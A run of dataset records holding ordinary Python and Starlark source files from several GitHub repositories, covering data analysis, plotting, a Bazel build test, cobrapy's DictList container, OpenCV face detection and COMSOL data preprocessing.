full_rmse.append(sqrt(mean_squared_error(df_subset_test.y, y_predict_full)))\n \n y_predict_train = model.predict(df_subset_train[sum([SAP_cols, CP_cols, ['asian_SUP']], [])])\n full_train_rmse.append(sqrt(mean_squared_error(df_subset_train.y, y_predict_train)))\n full_model.append(np.array(model.best_params_))\n\n\n ## Full -- without CP\n model.fit(df_subset_train[sum([SAP_cols, ['asian_SUP']], [])],\n df_subset_train.y)\n y_predict_full = model.predict(df_subset_test[sum([SAP_cols, ['asian_SUP']], [])])\n full_rmse_without_CP.append(sqrt(mean_squared_error(df_subset_test.y, y_predict_full)))\n\n y_predict_train = model.predict(df_subset_train[sum([SAP_cols, ['asian_SUP']], [])])\n full_train_rmse_without_CP.append(sqrt(mean_squared_error(df_subset_train.y, y_predict_train)))\n full_model.append(np.array(model.best_params_))\n\n\n\n\n\n ##\n ## OLS Portion\n ##\n model = sklearn.linear_model.LinearRegression()\n \n ## Full\n model.fit(df_subset_train[sum([SAP_cols, CP_cols, ['asian_SUP']], [])], \n df_subset_train.y)\n y_predict_full = model.predict(df_subset_test[sum([SAP_cols, CP_cols, ['asian_SUP']], [])])\n full_rmse_OLS.append(sqrt(mean_squared_error(df_subset_test.y, y_predict_full)))\n \n y_predict_train = model.predict(df_subset_train[sum([SAP_cols, CP_cols, ['asian_SUP']], [])])\n full_train_rmse_OLS.append(sqrt(mean_squared_error(df_subset_train.y, y_predict_train)))\n\n\n ## Full -- without CP\n model.fit(df_subset_train[sum([SAP_cols, ['asian_SUP']], [])],\n df_subset_train.y)\n y_predict_full = model.predict(df_subset_test[sum([SAP_cols, ['asian_SUP']], [])])\n full_rmse_OLS_without_CP.append(sqrt(mean_squared_error(df_subset_test.y, y_predict_full)))\n\n y_predict_train = model.predict(df_subset_train[sum([SAP_cols, ['asian_SUP']], [])])\n full_train_rmse_OLS_without_CP.append(sqrt(mean_squared_error(df_subset_train.y, y_predict_train)))\n\n\n\n\nresults = pd.DataFrame({'Full_RF_RMSE_test': full_rmse,\n 'Full_RF_RMSE_train': full_train_rmse,\n 'Full_OLS_RMSE_test': full_rmse_OLS,\n 'Full_OLS_RMSE_train': full_train_rmse_OLS,\n 'Full_RF_RMSE_test_without_CP': full_rmse_without_CP,\n 'Full_RF_RMSE_train_without_CP': full_train_rmse_without_CP,\n 'Full_OLS_RMSE_test_without_CP': full_rmse_OLS_without_CP,\n 'Full_OLS_RMSE_train_without_CP': full_train_rmse_OLS_without_CP})\n\nresults.to_csv('./output/Kang_output_record_model_with_and_without_keywords.csv')\n\n","repo_name":"kaltenburger/Bias","sub_path":"code/b_PopeSydnor/2_KC_NY_analysis/b1_PopeSydnor_applied_KC_RMSE_with_without_keywords.py","file_name":"b1_PopeSydnor_applied_KC_RMSE_with_without_keywords.py","file_ext":"py","file_size_in_byte":5889,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"34255219253","text":"import pandas as pd\nfrom datetime import datetime, timedelta\nfrom matplotlib import pyplot as plt\nfrom matplotlib import dates as mpl_dates\n\nplt.style.use('ggplot')\n\ndata = pd.read_csv(\n 'c:/Users/JINIT JAIN/OneDrive/Documents/GitHub/Vision-AI-Taskphase/Task-2/MATPLOTLIB/08/data8.csv')\n\ndata['Date'] = pd.to_datetime(data['Date'])\n# inplace is used to replace the thing at that time only after doing the editing of the file content\ndata.sort_values('Date', inplace=True)\n\nprice_date = data['Date']\nprice_close = data['Close']\n\nplt.plot_date(price_date, price_close, linestyle='solid')\n\nplt.gcf().autofmt_xdate()\n\nplt.title('Bitcoin Prices On Various Dates')\nplt.xlabel('Dates')\nplt.ylabel('Closing Prices')\n\nplt.tight_layout()\nplt.savefig('Bitcoin')\nplt.show()\n","repo_name":"jinit99/Vision-AI-Taskphase","sub_path":"Task-2/MATPLOTLIB/08/code8.py","file_name":"code8.py","file_ext":"py","file_size_in_byte":765,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"74317490329","text":"# Part of the Crubit project, under the Apache License v2.0 with LLVM\n# Exceptions. See /LICENSE for license information.\n# SPDX-License-Identifier: Apache-2.0 WITH LLVM-exception\n\n\"\"\"This module contains unit tests for pipelined compilation of bindings.\"\"\"\n\nload(\"@bazel_skylib//lib:unittest.bzl\", \"analysistest\", \"asserts\")\nload(\n \"//common:crubit_wrapper_macros_oss.bzl\",\n \"crubit_make_analysis_test\",\n)\nload(\n \"//rs_bindings_from_cc/test/bazel_unit_tests:defs.bzl\",\n \"ActionsInfo\",\n \"attach_aspect\",\n)\n\ndef _contains_input_of_type(name, input_type, inputs):\n return len([\n i\n for i in inputs\n if i.extension == input_type and i.basename.startswith(\"lib\" + name)\n ]) > 0\n\ndef _action_inputs_with_pipelining_analysis_test_impl(ctx):\n env = analysistest.begin(ctx)\n target_under_test = analysistest.target_under_test(env)\n\n metadata_action = [\n a\n for a in target_under_test[ActionsInfo].actions\n if a.mnemonic == \"RustcMetadata\"\n ][0]\n\n # Check that we generate metadata for our binding\n asserts.true(env, metadata_action != None)\n\n metadata_action_inputs = metadata_action.inputs.to_list()\n\n # Check that our metadata action accepts metadata inputs from the dependencies\n asserts.true(env, _contains_input_of_type(\"middle\", \"rmeta\", metadata_action_inputs))\n asserts.true(env, _contains_input_of_type(\"top\", \"rmeta\", metadata_action_inputs))\n asserts.false(env, _contains_input_of_type(\"middle\", \"rlib\", metadata_action_inputs))\n asserts.false(env, _contains_input_of_type(\"top\", \"rlib\", metadata_action_inputs))\n\n rlib_action = [a for a in target_under_test[ActionsInfo].actions if a.mnemonic == \"Rustc\"][0]\n rlib_action_inputs = rlib_action.inputs.to_list()\n\n # Check that the rlib action accepts metadata inputs from the dependencies\n asserts.true(env, _contains_input_of_type(\"middle\", \"rmeta\", rlib_action_inputs))\n asserts.true(env, _contains_input_of_type(\"top\", \"rmeta\", rlib_action_inputs))\n asserts.false(env, _contains_input_of_type(\"middle\", \"rlib\", rlib_action_inputs))\n asserts.false(env, _contains_input_of_type(\"top\", \"rlib\", rlib_action_inputs))\n\n return analysistest.end(env)\n\naction_inputs_with_pipelining_analysis_test = crubit_make_analysis_test(\n _action_inputs_with_pipelining_analysis_test_impl,\n)\n\ndef _targets_for_pipelined_compilation():\n native.cc_library(\n name = \"top\",\n hdrs = [\n \"top.h\",\n ],\n )\n native.cc_library(\n name = \"middle\",\n hdrs = [\n \"middle.h\",\n ],\n deps = [\":top\"],\n )\n native.cc_library(\n name = \"bottom\",\n hdrs = [\"bottom.h\"],\n deps = [\":middle\"],\n )\n\n attach_aspect(name = \"pipelined_compilation_of_bindings\", dep = \":bottom\")\n\n action_inputs_with_pipelining_analysis_test(\n name = \"pipelined_compilation_of_bindings_test\",\n target_under_test = \":pipelined_compilation_of_bindings\",\n )\n\ndef pipelined_compilation_test(name):\n \"\"\"Sets up rust_bindings_from_cc_aspect test suite.\n\n Args:\n name: name of the test suite\"\"\"\n _targets_for_pipelined_compilation()\n\n native.test_suite(\n name = name,\n tests = [\n \":pipelined_compilation_of_bindings_test\",\n ],\n )\n","repo_name":"google/crubit","sub_path":"rs_bindings_from_cc/test/bazel_unit_tests/pipelined_compilation/pipelined_compilation_test.bzl","file_name":"pipelined_compilation_test.bzl","file_ext":"bzl","file_size_in_byte":3315,"program_lang":"python","lang":"en","doc_type":"code","stars":420,"dataset":"github-code","pt":"31"} +{"seq_id":"7659799886","text":"\"\"\"\n1487, 4817, 8147은 3330씩 늘어나는 등차수열입니다. 이 수열에는 특이한 점이 두 가지 있습니다.\n● 세 수는 모두 소수입니다.\n● 세 수는 각각 다른 수의 자릿수를 바꿔서 만들 수 있는 순열(permutation)입니다.\n1자리, 2자리, 3자리의 소수 중에서는 위와 같은 성질을 갖는 수열이 존재하지 않습니다. 하지만 4자리라면 위엣것 말고도 또 다른 수열이 존재합니다.\n그 수열의 세 항을 이었을 때 만들어지는 12자리 수는 무엇입니까?\n\"\"\"\n\nimport numpy as np\nfrom sympy import isprime\nfrom itertools import permutations\n\nfor n in range(1000,10000): \n per = np.array([])\n for i,j,k,l in permutations(str(n)):\n if isprime(int(i+j+k+l)) and i!=\"0\":\n per = np.append(per, int(i+j+k+l))\n \n for ii in per:\n for jj in per:\n for kk in per:\n if ii 2:\n raise TypeError(f\"takes at most 1 argument ({len(args):d} given)\")\n super(DictList, self).__init__(self)\n self._dict = {}\n if len(args) == 1:\n other = args[0]\n if isinstance(other, DictList):\n list.extend(self, other)\n self._dict = other._dict.copy()\n else:\n self.extend(other)\n\n # noinspection PyShadowingBuiltins\n def has_id(self, id: Union[Object, str]) -> bool:\n \"\"\"Check if id is in DictList.\"\"\"\n return id in self._dict\n\n # noinspection PyShadowingBuiltins\n def _check(self, id: Union[Object, str]) -> None:\n \"\"\"Make sure duplicate id's are not added.\n\n This function is called before adding in elements.\n\n \"\"\"\n if id in self._dict:\n raise ValueError(f\"id {str(id)} is already present in list\")\n\n def _generate_index(self) -> None:\n \"\"\"Rebuild the _dict index.\"\"\"\n self._dict = {v.id: k for k, v in enumerate(self)}\n\n # noinspection PyShadowingBuiltins\n def get_by_id(self, id: Union[Object, str]) -> Object:\n \"\"\"Return the element with a matching id.\"\"\"\n return list.__getitem__(self, self._dict[id])\n\n def list_attr(self, attribute: str) -> list:\n \"\"\"Return a list of the given attribute for every object.\"\"\"\n return [getattr(i, attribute) for i in self]\n\n def get_by_any(self, iterable: List[Union[str, Object, int]]) -> list:\n \"\"\"Get a list of members using several different ways of indexing.\n\n Parameters\n ----------\n iterable : list (if not, turned into single element list)\n list where each element is either int (referring to an index in\n in this DictList), string (a id of a member in this DictList) or\n member of this DictList for pass-through\n\n Returns\n -------\n list\n a list of members\n \"\"\"\n\n def get_item(item: Any) -> Any:\n if isinstance(item, int):\n return self[item]\n elif isinstance(item, str):\n return self.get_by_id(item)\n elif item in self:\n return item\n else:\n raise TypeError(f\"item in iterable cannot be '{type(item)}'\")\n\n if not isinstance(iterable, list):\n iterable = [iterable]\n return [get_item(item) for item in iterable]\n\n def query(\n self,\n search_function: Union[str, Pattern, Callable],\n attribute: Union[str, None] = None,\n ) -> \"DictList\":\n \"\"\"Query the list.\n\n Parameters\n ----------\n search_function : a string, regular expression or function\n Used to find the matching elements in the list.\n - a regular expression (possibly compiled), in which case the\n given attribute of the object should match the regular expression.\n - a function which takes one argument and returns True for\n desired values\n\n attribute : string or None\n the name attribute of the object to passed as argument to the\n `search_function`. If this is None, the object itself is used.\n\n Returns\n -------\n DictList\n a new list of objects which match the query\n\n Examples\n --------\n >>> from cobra.io import load_model\n >>> model = load_model('textbook')\n >>> model.reactions.query(lambda x: x.boundary)\n >>> import re\n >>> regex = re.compile('^g', flags=re.IGNORECASE)\n >>> model.metabolites.query(regex, attribute='name')\n \"\"\"\n\n def select_attribute(x: Optional[Any]) -> Any:\n if attribute is None:\n return x\n else:\n return getattr(x, attribute)\n\n try:\n # if the search_function is a regular expression\n regex_searcher = re.compile(search_function)\n\n if attribute is not None:\n matches = (\n i for i in self if regex_searcher.findall(select_attribute(i)) != []\n )\n\n else:\n # Don't regex on objects\n matches = (i for i in self if regex_searcher.findall(i.id) != [])\n\n except TypeError:\n matches = (i for i in self if search_function(select_attribute(i)))\n\n results = self.__class__()\n results._extend_nocheck(matches)\n return results\n\n def _replace_on_id(self, new_object: Object) -> None:\n \"\"\"Replace an object by another with the same id.\"\"\"\n the_id = new_object.id\n the_index = self._dict[the_id]\n list.__setitem__(self, the_index, new_object)\n\n # overriding default list functions with new ones\n def append(self, entity: Object) -> None:\n \"\"\"Append object to end.\"\"\"\n the_id = entity.id\n self._check(the_id)\n self._dict[the_id] = len(self)\n list.append(self, entity)\n\n def union(self, iterable: Iterable[Object]) -> None:\n \"\"\"Add elements with id's not already in the model.\"\"\"\n _dict = self._dict\n append = self.append\n for i in iterable:\n if i.id not in _dict:\n append(i)\n\n def extend(self, iterable: Iterable[Object]) -> None:\n \"\"\"Extend list by appending elements from the iterable.\n\n Sometimes during initialization from an older pickle, _dict\n will not have initialized yet, because the initialization class was\n left unspecified. This is an issue because unpickling calls\n DictList.extend, which requires the presence of _dict. Therefore,\n the issue is caught and addressed here.\n\n Parameters\n ----------\n iterable : Iterable\n \"\"\"\n if getattr(self, \"_dict\", None) is None:\n self._dict = {}\n _dict = self._dict\n current_length = len(self)\n list.extend(self, iterable)\n for i, obj in enumerate(islice(self, current_length, None), current_length):\n the_id = obj.id\n if the_id not in _dict:\n _dict[the_id] = i\n else:\n # undo the extend and raise an error\n self = self[:current_length]\n self._check(the_id)\n # if the above succeeded, then the id must be present\n # twice in the list being added\n raise ValueError(\n f\"id '{str(the_id)}' at index {i :d} is non-unique. \"\n f\"Is it present twice?\"\n )\n\n def _extend_nocheck(self, iterable: Iterable[Object]) -> None:\n \"\"\"Extend without checking for uniqueness.\n\n This function should only be used internally by DictList when it\n can guarantee elements are already unique (as in when coming from\n self or other DictList). It will be faster because it skips these\n checks.\n\n Parameters\n ----------\n iterable : Iterable\n\n \"\"\"\n current_length = len(self)\n list.extend(self, iterable)\n _dict = self._dict\n if not current_length:\n self._generate_index()\n return\n for i, obj in enumerate(islice(self, current_length, None), current_length):\n _dict[obj.id] = i\n\n def __sub__(self, other: Iterable[Object]) -> \"DictList\":\n \"\"\"Remove a value or values, and returns the new DictList.\n\n x.__sub__(y) <==> x - y\n\n Parameters\n ----------\n other : iterable\n other must contain only unique id's present in the list\n Returns\n -------\n total: DictList\n new DictList with item(s) removed\n \"\"\"\n total = DictList()\n total.extend(self)\n for item in other:\n total.remove(item)\n return total\n\n def __isub__(self, other: Iterable[Object]) -> \"DictList\":\n \"\"\"Remove a value or values in place.\n\n x.__sub__(y) <==> x -= y\n\n Parameters\n ----------\n other : iterable\n other must contain only unique id's present in the list\n \"\"\"\n for item in other:\n self.remove(item)\n return self\n\n def __add__(self, other: Iterable[Object]) -> \"DictList\":\n \"\"\"Add item while returning a new DictList.\n\n x.__add__(y) <==> x + y\n\n Parameters\n ----------\n other : iterable\n other must contain only unique id's which do not intersect\n with self\n \"\"\"\n total = DictList()\n total.extend(self)\n total.extend(other)\n return total\n\n def __iadd__(self, other: Iterable[Object]) -> \"DictList\":\n \"\"\"Add item while returning the same DictList.\n\n x.__iadd__(y) <==> x += y\n\n Parameters\n ----------\n other : iterable\n other must contain only unique id's whcih do not intersect\n with self\n\n \"\"\"\n self.extend(other)\n return self\n\n def __reduce__(self) -> Tuple[Type[\"DictList\"], Tuple, dict, Iterator]:\n \"\"\"Return a reduced version of DictList.\n\n This reduced version details the class, an empty Tuple, a dictionary of the\n state and an iterator to go over the DictList.\n \"\"\"\n return self.__class__, (), self.__getstate__(), self.__iter__()\n\n def __getstate__(self) -> dict:\n \"\"\"Get internal state.\n\n This is only provided for backwards compatibility so older\n versions of cobrapy can load pickles generated with cobrapy. In\n reality, the \"_dict\" state is ignored when loading a pickle\n \"\"\"\n return {\"_dict\": self._dict}\n\n def __setstate__(self, state: dict) -> None:\n \"\"\"Pretend to set internal state. Actually recalculates.\n\n Ignore the passed in state and recalculate it. This is only for\n compatibility with older pickles which did not correctly specify\n the initialization class\n \"\"\"\n self._generate_index()\n\n # noinspection PyShadowingBuiltins\n def index(self, id: Union[str, Object], *args) -> int:\n \"\"\"Determine the position in the list.\n\n Parameters\n ----------\n id: A string or a :class:`~cobra.core.Object.Object`\n\n \"\"\"\n # because values are unique, start and stop are not relevant\n if isinstance(id, str):\n try:\n return self._dict[id]\n except KeyError:\n raise ValueError(f\"{id} not found\")\n try:\n i = self._dict[id.id]\n if self[i] is not id:\n raise ValueError(\n f\"Another object with the identical id ({id.id}) found\"\n )\n return i\n except KeyError:\n raise ValueError(f\"{str(id)} not found\")\n\n def __contains__(self, entity: Union[str, Object]) -> bool:\n \"\"\"Ask if the DictList contain an entity.\n\n DictList.__contains__(entity) <==> entity in DictList\n\n Parameters\n ----------\n entity: str or :class:`~cobra.core.Object.Object`\n\n \"\"\"\n if hasattr(entity, \"id\"):\n the_id = entity.id\n # allow to check with the object itself in addition to the id\n else:\n the_id = entity\n return the_id in self._dict\n\n def __copy__(self) -> \"DictList\":\n \"\"\"Copy the DictList into a new one.\"\"\"\n the_copy = DictList()\n list.extend(the_copy, self)\n the_copy._dict = self._dict.copy()\n return the_copy\n\n def insert(self, index: int, entity: Object) -> None:\n \"\"\"Insert entity before index.\"\"\"\n self._check(entity.id)\n list.insert(self, index, entity)\n # all subsequent entries now have been shifted up by 1\n _dict = self._dict\n for i, j in _dict.items():\n if j >= index:\n _dict[i] = j + 1\n _dict[entity.id] = index\n\n def pop(self, *args) -> Object:\n \"\"\"Remove and return item at index (default last).\"\"\"\n value = list.pop(self, *args)\n index = self._dict.pop(value.id)\n # If the pop occurred from a location other than the end of the list,\n # we will need to subtract 1 from every entry afterwards\n if len(args) == 0 or args == [-1]: # removing from the end of the list\n return value\n _dict = self._dict\n for i, j in _dict.items():\n if j > index:\n _dict[i] = j - 1\n return value\n\n def add(self, x: Object) -> None:\n \"\"\"Opposite of `remove`. Mirrors set.add.\"\"\"\n self.extend([x])\n\n def remove(self, x: Union[str, Object]) -> None:\n \"\"\".. warning :: Internal use only.\n\n Each item is unique in the list which allows this\n It is much faster to do a dict lookup than n string comparisons\n \"\"\"\n self.pop(self.index(x))\n\n # these functions are slower because they rebuild the _dict every time\n def reverse(self) -> None:\n \"\"\"Reverse *IN PLACE*.\"\"\"\n list.reverse(self)\n self._generate_index()\n\n def sort(\n self, cmp: Callable = None, key: Callable = None, reverse: bool = False\n ) -> None:\n \"\"\"Stable sort *IN PLACE*.\n\n cmp(x, y) -> -1, 0, 1\n\n \"\"\"\n if key is None:\n\n def key(i):\n return i.id\n\n list.sort(self, key=key, reverse=reverse)\n\n self._generate_index()\n\n def __getitem__(\n self, i: Union[int, slice, Iterable, Object, \"DictList\"]\n ) -> Union[\"DictList\", Object]:\n \"\"\"Get item from DictList.\"\"\"\n if isinstance(i, int):\n return list.__getitem__(self, i)\n elif isinstance(i, slice):\n selection = self.__class__()\n selection._extend_nocheck(list.__getitem__(self, i))\n return selection\n elif hasattr(i, \"__len__\"):\n if len(i) == len(self) and isinstance(i[0], (bool, bool)):\n selection = self.__class__()\n result = (o for j, o in enumerate(self) if i[j])\n selection._extend_nocheck(result)\n return selection\n else:\n return self.__class__(list.__getitem__(self, i))\n else:\n return list.__getitem__(self, i)\n\n def __setitem__(self, i: Union[slice, int], y: Union[list, Object]) -> None:\n \"\"\"Set an item via index or slice.\n\n Parameters\n ----------\n i : slice, int\n i can be slice or int. If i is a slice, y needs to be a list\n y: list, Object\n Object to set as\n \"\"\"\n if isinstance(i, slice):\n # In this case, y needs to be a list. We will ensure all\n # the id's are unique\n for obj in y: # need to be setting to a list\n self._check(obj.id)\n # Insert a temporary placeholder so we catch the presence\n # of a duplicate in the items being added\n self._dict[obj.id] = None\n list.__setitem__(self, i, y)\n self._generate_index()\n return\n # in case a rename has occurred\n if self._dict.get(self[i].id) == i:\n self._dict.pop(self[i].id)\n the_id = y.id\n self._check(the_id)\n list.__setitem__(self, i, y)\n self._dict[the_id] = i\n\n def __delitem__(self, index: int) -> None:\n \"\"\"Remove item from DictList.\"\"\"\n removed = self[index]\n list.__delitem__(self, index)\n if isinstance(removed, list):\n self._generate_index()\n return\n _dict = self._dict\n _dict.pop(removed.id)\n for i, j in _dict.items():\n if j > index:\n _dict[i] = j - 1\n\n def __getslice__(self, i: int, j: int) -> \"DictList\":\n \"\"\"Get a slice from it to j of DictList.\"\"\"\n return self.__getitem__(slice(i, j))\n\n def __setslice__(self, i: int, j: int, y: Union[list, Object]) -> None:\n \"\"\"Set slice, where y is an iterable.\"\"\"\n self.__setitem__(slice(i, j), y)\n\n def __delslice__(self, i: int, j: int) -> None:\n \"\"\"Remove slice.\"\"\"\n self.__delitem__(slice(i, j))\n\n def __getattr__(self, attr: Any) -> Any:\n \"\"\"Get an attribute by id.\"\"\"\n try:\n return DictList.get_by_id(self, attr)\n except KeyError:\n raise AttributeError(f\"DictList has no attribute or entry {attr}\")\n\n def __dir__(self) -> list:\n \"\"\"Directory of the DictList.\n\n Override this to allow tab complete of items by their id.\n\n Returns\n -------\n attributes: list\n A list of attributes/entities.\n \"\"\"\n attributes = dir(self.__class__)\n attributes.append(\"_dict\")\n attributes.extend(self._dict.keys())\n return attributes\n","repo_name":"opencobra/cobrapy","sub_path":"src/cobra/core/dictlist.py","file_name":"dictlist.py","file_ext":"py","file_size_in_byte":17550,"program_lang":"python","lang":"en","doc_type":"code","stars":421,"dataset":"github-code","pt":"31"} +{"seq_id":"72331766168","text":"#Image face detection of picture\nimport cv2\n\nface_cascade = cv2.CascadeClassifier('haarcascade_frontalface_default.xml')\n\nimg = cv2.imread('faces.jpg')\n\nfaces = face_cascade.detectMultiScale(img, 1.1, 4)\n\nfor (x, y, w, h) in faces:\n cv2.rectangle(img, (x, y), (x+w, y+h), (0, 0, 255), 2)\n\ncv2.imshow('image', img)\ncv2.waitKey()\n\n#Image face detection using webcam\n\nface_cascade = cv2.CascadeClassifier('haarcascade_frontalface_default.xml')\n\ncap = cv2.VideoCapture(0)\n\nwhile True:\n _, img =cap.read()\n\n gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY\n )\n faces = face_cascade.detectMultiScale(img, 1.1, 4)\n\n for (x, y, w, h) in faces:\n cv2.rectangle(img, (x, y), (x+w, y+h), (0, 0, 255), 2)\n\n cv2.imshow('image', img)\n k = cv2.waitKey(30) & 0xff\n\n if k==27:\n break\ncap.release()\n","repo_name":"jaweria332/OpenCV-practice","sub_path":"ImageFaceDetection.py","file_name":"ImageFaceDetection.py","file_ext":"py","file_size_in_byte":836,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"31344437589","text":"import pandas as pd\nimport numpy as np\n\nfilepath = \"datafile.xlsx\"\ndata = pd.read_excel(filepath, header=0, index_col=None, usecols=\"A:J\")\n\n# print(data.head(10))\n\ncol_names = list(data.columns[1:])\nprint(col_names)\n\nfor col in col_names:\n data[col] = data[col] == 1.0\n data[col] = data[col].astype(int)\n data[col] = data[col].astype(str)\n \ndata['Pattern'] = data[col_names].agg('-'.join, axis=1)\n \nprint(data.head())\nprint(data.dtypes)\n\nuniquePatterns = data[\"Pattern\"].unique()\n\nfor pat in uniquePatterns:\n rows = data.loc[data[\"Pattern\"] == pat]\n coy = list(rows[\"Dummy Code\"])\n filename = \"./output/output\" + pat + \".csv\"\n with open(filename, 'w') as file:\n rows.to_csv(file, index=None)","repo_name":"mipsmonsta/product_brand_automation","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":725,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"41185893886","text":"import os\nfrom PIL import Image, ImageFilter\nimport numpy as np\nfrom numba import njit\nfrom get_data import get_data\nfrom matplotlib import pyplot as plt\n\ndir2work = os.path.normpath(input('Input an abs link to images: '))\ntry:\n images_list = os.listdir(dir2work) # ['name1.jpg', 'name2.jpg', ...]\nexcept FileNotFoundError:\n print('Invalid value')\n exit()\n\nprev_image = []\ncurrent_image = []\ndiffer_image = []\n\n@njit\ndef check_limits(matrix):\n for i in matrix:\n for j in i:\n if j < 0.:\n j = 0.\n if j > 255.:\n j = 255.\n return matrix\n\n\nint = []\nint_ch = []\nfor img in images_list:\n ch1_data, ch2_data, ch3_data = get_data(os.path.join(dir2work, img))\n if images_list.index(img) > 0:\n current_images = np.array([ch1_data[0], ch2_data[0], ch3_data[0]])\n im = Image.fromarray(current_images[2]).filter(ImageFilter.MedianFilter(size=3)).convert('L')\n current_image = np.array(im, dtype=np.float)\n # print(type(current_image[0][0]))\n differ_image = current_image - prev_image\n # int.append(np.sum(differ_images[2]))\n differ_image = check_limits(differ_image)\n # differ_image = np.array(current_image, dtype=np.uint8)\n # int_ch.append(np.sum(differ_images[2]))\n # Image.fromarray(current_images[2]).show()\n im = Image.fromarray(differ_image)\n plt.imshow(im, cmap='hot')\n plt.show()\n im.convert('RGB').save(os.path.join(os.path.join(os.getcwd(), f'diff_images'), img))\n print(images_list.index(img))\n elif images_list.index(img) == 0:\n current_image = np.array([ch1_data[0], ch2_data[0], ch3_data[0]])[2]\n prev_image = current_image\n\n# print(int)\n# print(int_ch)\n# plt.plot(int, label='not ch')\n# plt.plot(int_ch, label='ch')\n# plt.legend()\n# plt.show()\n","repo_name":"MikhailButs/He_multich_analysis","sub_path":"app2findELM.py","file_name":"app2findELM.py","file_ext":"py","file_size_in_byte":1848,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"30382401966","text":"from numpy.lib.function_base import angle\r\nimport pandas as pd\r\nimport numpy as np\r\nimport math\r\nfrom bokeh.io import output_notebook\r\nfrom bokeh.plotting import figure, show\r\nfrom bokeh.transform import linear_cmap\r\nfrom bokeh.layouts import column, row\r\nfrom bokeh.models import CustomJS, Div, ColumnDataSource\r\n# def getData(csv_file):\r\n# Data=pd.read_csv(csv_file)\r\n# Data=Data.iloc[5:,]\r\n# return Data\r\n# print(getData(\"alpha1 - Copy.csv\"))\r\n\r\nimport csv\r\ndef getData(csv_file,convert_angle=None,decimals=None):\r\n with open(csv_file,'r') as roughData, open(csv_file.strip(\".csv\")+\"_Copy.csv\",'w+') as newData:\r\n wr=csv.writer(newData)\r\n data_in_list=[]\r\n for row in roughData:\r\n data_in_list.append(row)\r\n # print(data_in_list[1][0])\r\n for i in range(len(data_in_list)):\r\n if data_in_list[i][0].isdigit():\r\n newData.write(data_in_list[i-1])\r\n newData.write(data_in_list[-1])\r\n data=pd.read_csv(csv_file.strip(\".csv\")+\"_Copy.csv\")\r\n if convert_angle=='rad2deg': data.iloc[:,0]=np.round(data.iloc[:,0]*180/math.pi,3)\r\n elif convert_angle=='deg2rad': data.iloc[:,0]=np.round(data.iloc[:,0]*math.pi/180,3)\r\n\r\n if decimals!=None: \r\n for i in range(np.shape(data)[1]-1):\r\n data.iloc[:,i]=np.round(data.iloc[:,i],decimals)\r\n return data\r\n\r\n\r\n\r\ndef Transform2D(Data):\r\n a=list(Data)[0]\r\n f=list(Data)[-2]\r\n R=list(Data)[-1]\r\n list_a=[]\r\n for alpha in Data[a].values:\r\n if alpha not in list_a:\r\n list_a.append(alpha)\r\n list_f=[]\r\n for freq in Data[f].values:\r\n if freq not in list_f:\r\n list_f.append(freq)\r\n Data2D=np.zeros((len(list_a),len(list_f)))\r\n for i in range(len(list_a)):\r\n for j in range(len(list_f)):\r\n Data2D[i,j]=Data[(Data[a]==list_a[i])&(Data[f]==list_f[j])][R].values[0]\r\n return Data2D\r\n \r\ndef dataGenerate(dataFrame,smallerPart,angle_unit=\"rad\",decimals=5):\r\n a=list(dataFrame)[0]\r\n f=list(dataFrame)[-2]\r\n R=list(dataFrame)[-1]\r\n list_a=[]\r\n for alpha in dataFrame[a].values:\r\n if alpha not in list_a:\r\n list_a.append(alpha)\r\n list_f=[]\r\n for freq in dataFrame[f].values:\r\n if freq not in list_f:\r\n list_f.append(freq)\r\n \r\n stepF=(list_f[1]-list_f[0])/smallerPart\r\n \r\n newData=pd.DataFrame()\r\n \r\n for alpha in list_a:\r\n \r\n for freq in list_f:\r\n TotalR=dataFrame[(dataFrame[a]==alpha)&(dataFrame[f]==freq)][R].values[0]\r\n for i in range(smallerPart-1):\r\n newData=newData.append(pd.DataFrame({a:[alpha],f:[np.round(freq+(i+1)*stepF,decimals)],R:[TotalR]}))\r\n return newData\r\n\r\n\r\ndef drawSurface(csv_file,smallerPart,angle_unit='rad',decimals=5,output='html'):\r\n df1=getData(csv_file,'deg',decimals=decimals)\r\n df=dataGenerate(df1,smallerPart=smallerPart,decimals=decimals)\r\n Data=Transform2D(df)\r\n\r\n a=list(df)[0]\r\n f=list(df)[-2]\r\n R=list(df)[-1]\r\n\r\n list_a=pd.unique(df1[a])\r\n list_f=pd.unique(df1[f])\r\n \r\n if output=='ipynb' : output_notebook()\r\n s1=ColumnDataSource(data=dict(x=df[a],y=df[f]))\r\n p=figure(tools=\"lasso_select,box_select\")\r\n p.circle('x','y',source=s1, fill_color=\"red\",fill_alpha=0.2)\r\n p.image(image=[Data.T], x=0, y=np.amin(df[f]), dw=np.amax(df[a]), dh=np.amax(df[f])-np.amin(df[f]), palette='Magma256', level=\"image\")\r\n p.grid.grid_line_width = 0.1\r\n\r\n\r\n s2=ColumnDataSource(data=dict(x=[],y=[]))\r\n div=Div(width=p.width, height=20000)\r\n p2=figure()\r\n p2.circle('x','y',source=s2, fill_color=\"red\")\r\n\r\n s1.selected.js_on_change('indices', CustomJS(args=dict(s1=s1,s2=s2,div=div), code=\"\"\"\r\n const inds=cb_obj.indices;\r\n const d1 = s1.data;\r\n const d2 = s2.data;\r\n d2['x'] = []\r\n d2['y'] = []\r\n for (let i = 0; i < inds.length; i++) {\r\n d2['x'].push(d1['x'][inds[i]])\r\n d2['y'].push(d1['y'][inds[i]])\r\n \r\n }\r\n div.text=[d2['x'].join(\" \"), d2['y'].join(\" \"),inds.length].join(\"\\\\n\")\r\n \"\"\")\r\n )\r\n\r\n\r\n layout=column(p,div)\r\n show(layout)\r\n ","repo_name":"hoanglv7501/comsol-optimize","sub_path":"preprocess.py","file_name":"preprocess.py","file_ext":"py","file_size_in_byte":4252,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"6884017347","text":"from sregistry.logger import bot\nimport json\nimport sys\nimport re\n\n\ndef main(args, parser, extra):\n from sregistry.main import get_client\n\n if args.name is None:\n msg = \"You must add the --name of a container uri to build.\"\n bot.exit(msg)\n\n cli = get_client(image=args.name, 